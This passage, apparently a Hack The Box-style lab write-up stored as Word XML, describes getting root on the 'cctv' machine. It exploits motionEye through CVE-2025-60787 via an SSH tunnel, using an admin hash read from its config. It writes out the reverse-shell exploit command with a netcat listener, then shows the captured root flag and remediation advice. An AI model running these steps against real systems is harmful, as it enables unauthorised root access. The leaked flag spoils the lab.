    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000161">
      <w:pPr>
        <w:spacing w:after="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finding is rated CRITICAL because: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resulted in a root shell — the highest possible level of access on a Linux system</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exploit script is publicly available on GitHub and easy to run with minimal effort</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motionEye was running as root, meaning any code it executed also ran as root — amplifying the impact enormously</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root access, an attacker has unlimited control: read all files, install malware, create backdoors, shut down services, or destroy the system entirely</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000166">
      <w:pPr>
        <w:spacing w:after="0" w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000167">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Step-by-Step Exploitation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000168">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1 — With SSH access as mark (obtained in Finding 3), the internal services running on the machine were enumerated. The motionEye systemd service file revealed the service runs as the root user:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000169">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="4391025" cy="4429125"/>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3910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11: The motionEye service file showing User=root — the service runs with full root privileges</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016B">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2 — The motionEye configuration file was read to find the admin credentials needed for the exploit:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016C">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5029200" cy="2628900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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29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12: /etc/motioneye/motion.conf containing admin username and hashed password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016E">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3 — motionEye only listens on localhost, meaning it cannot be reached directly from outside. SSH port forwarding was used to tunnel access to it through the existing SSH connection:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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16F">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ssh -L 8765:127.0.0.1:7999 mark@cctv.htb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71">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72">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73">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74">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Opens an SSH connection to the target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5">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-L 8765:127.0.0.1:7999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76">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Local port forwarding: any traffic sent to port 8765 on the attack machine is tunnelled through the SSH connection and forwarded to 127.0.0.1:7999 on the target — where motionEye is listening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77">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mark@cctv.htb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78">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Connects as user mark to the hostname cctv.htb</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000179">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5029200" cy="4067175"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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0292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13: SSH port forwarding established — motionEye now accessible via the tunnel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017B">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="4114800" cy="4505325"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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48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14: motionEye accessible at http://127.0.0.1:9000 through the SSH tunnel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017D">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4 — The public CVE-2025-60787 proof-of-concept exploit was found on GitHub and cloned to the attack machine:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017E">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5305425" cy="3057525"/>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054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15: GitHub repository for CVE-2025-60787 — Authenticated RCE PoC for motionEye</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000180">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5029200" cy="3248025"/>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292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16: Cloning the exploit script using git clone</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000182">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5 — A netcat listener was set up on the target machine on port 9999 (via the SSH session as mark). The initial attempt pointed the reverse shell back to the attack machine's tun0 IP, but the outbound firewall blocked it. The reverse shell was then pointed to localhost (127.0.0.1) so it connects to the listener on the machine itself:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000183">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="3200400" cy="857250"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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20040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17: Netcat listener running on port 9999 on the target machine — waiting for the connection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000185">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6 — The exploit was run pointing the reverse shell to 127.0.0.1:9999:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000186">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5305425" cy="2419350"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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30542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18: First exploit attempt pointing to tun0 — payload injected but firewall blocked the outbound connection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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920"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2800"/>
            <w:gridCol w:w="692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1e1e1e" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="140.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000188">
            <w:pPr>
              <w:pBdr>
                <w:left w:color="2e75b6" w:space="0" w:sz="20" w:val="single"/>
              </w:pBdr>
              <w:shd w:fill="1e1e1e" w:val="clear"/>
              <w:spacing w:after="90" w:before="90" w:lineRule="auto"/>
              <w:ind w:left="380" w:firstLine="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="a8ff78"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">python3 CVE-2025-60787.py revshell --url http://127.0.0.1:8765 --user admin --password 989c5a8ee87a0e9521ec81a79187d162109282f0 -i 127.0.0.1 --port 9999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8A">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Flag / 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8B">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8C">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python3 CVE-2025-60787.py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8D">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Runs the exploit script using Python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E">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revshell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8F">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tells the script to use reverse shell mode — inject a command into motionEye that connects back to our listener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0">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--url http://127.0.0.1:8765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1">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The motionEye URL — accessible on our machine via the SSH tunnel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2">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--user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3">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The motionEye admin username found in the configuration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4">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--password 989c5a...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5">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The motionEye admin password hash found in the configuration file — used to authenticate to motionEye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6">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-i 127.0.0.1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197">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The IP address the reverse shell connects back to — localhost, because the firewall blocks outbound connections to the attack machine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8">
            <w:pPr>
              <w:spacing w:after="50" w:before="50" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="1b2a4a"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">--port 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99">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The port the netcat listener is waiting on for the incoming shell connection</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019A">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5305425" cy="2667000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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3054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19: Second attempt pointing to 127.0.0.1 — payload successfully injected into motionEye</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019C">
      <w:pPr>
        <w:spacing w:after="8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Step 7 — The reverse shell connected on the target machine. Root shell confirmed:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019D">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5305425" cy="81915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3054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20: root@cctv:/etc/motioneye# — full root shell obtained via motionEye RCE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019F">
      <w:pPr>
        <w:spacing w:after="0" w:before="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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20"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2000"/>
            <w:gridCol w:w="7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A0">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ROOT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A1">
            <w:pPr>
              <w:spacing w:after="20" w:before="40" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="666666"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/root/root.txt</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A2">
            <w:pPr>
              <w:spacing w:after="40" w:before="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c00000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">207c878c2b801577ca2d89f4dfc2cb3f</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A3">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5029200" cy="2505075"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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292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21: Root flag captured at /root/root.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A5">
      <w:pPr>
        <w:spacing w:after="0" w:before="140" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="404040"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A7">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Update motionEye to the latest patched version. Change the systemd service configuration from "User=root" to a dedicated low-privilege account — this limits the damage any future vulnerability can cause. Apply the principle of least privilege: services should only have the minimum permissions they need to function.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A8">
      <w:pPr>
        <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">References: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2025-60787  |  CWE-78: OS Command Injection  |  MITRE ATT&amp;CK T1068 — Privilege Escalation</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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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AA">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6.  EXPLOITATION PATH &amp; ATTACK NARRATIVE</w:t>
            </w:r>
